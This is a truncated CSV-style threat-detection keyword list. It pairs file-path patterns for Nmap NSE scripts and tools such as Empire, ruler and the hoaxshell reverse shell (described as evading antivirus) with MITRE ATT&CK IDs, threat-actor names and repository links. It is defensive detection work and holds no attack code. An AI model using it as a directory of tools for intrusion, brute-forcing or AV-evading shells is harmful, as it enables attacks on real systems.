NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-git.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-gitweb-projects-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-google-malware.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-grep.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-headers.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-hp-ilo-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-huawei-hg5xx-vuln.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-icloud-findmyiphone.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-icloud-sendmsg.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-iis-short-name-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-iis-webdav-vuln.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-internal-ip-disclosure.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-joomla-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-jsonp-detection.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-lexmark-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/nccgroup/nmap-nse-vulnerability-scripts,1,1,N/A,N/A,7,620,64,2022-03-04T09:08:55Z,2021-05-18T15:20:30Z -*/http-lfi.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts,1,1,N/A,N/A,10,920,383,2022-01-22T18:40:30Z,2011-05-31T05:41:49Z -*/http-litespeed-sourcecode-download.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/HTTP-Login.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1109,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*/http-ls.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-majordomo2-dir-traversal.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-malware-host.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-mcmp.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-methods.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-method-tamper.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-mobileversion-checker.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-nikto-scan.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts,1,1,N/A,N/A,10,920,383,2022-01-22T18:40:30Z,2011-05-31T05:41:49Z -*/http-ntlm/ntlmtransport*,offensive_tool_keyword,ruler,A tool to abuse Exchange services,T1102.001 - T1201.001 - T1570.002,TA0006,N/A,N/A,Exploitation tools,https://github.com/sensepost/ruler,1,1,N/A,N/A,10,1991,353,2021-02-19T09:28:07Z,2016-08-18T15:05:13Z -*/http-ntlm-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-open-proxy.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-open-redirect.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-passwd.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-phpmyadmin-dir-traversal.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-phpself-xss.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-php-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-proxy-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-put.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-put-server.py*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/http-qnap-nas-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-referer-checker.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-rfi-spider.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-robots.txt.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-robtex-reverse-ip.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-robtex-shared-ns.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/https_payload.ps1*,offensive_tool_keyword,hoaxshell,An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic,T1203 - T1133 - T1190,TA0001 - TA0002 - TA0006,N/A,N/A,Exploitation tools,https://github.com/t3l3machus/hoaxshell,1,1,N/A,N/A,10,2655,443,2023-06-18T13:26:32Z,2022-07-10T15:36:24Z -*/http-sap-netweaver-leak.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-security-headers.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-server-header.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-shellshock.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-sitemap-generator.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-slowloris.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-slowloris-check.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-sql-injection.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/https-redirect.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-stored-xss.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-svn-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-svn-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-tenda-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts,1,1,N/A,N/A,10,920,383,2022-01-22T18:40:30Z,2011-05-31T05:41:49Z -*/http-title.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-tplink-dir-traversal.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-trace.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-traceroute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-trane-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-unsafe-output-escaping.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-useragent-tester.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-userdir-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/http-vhosts.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - 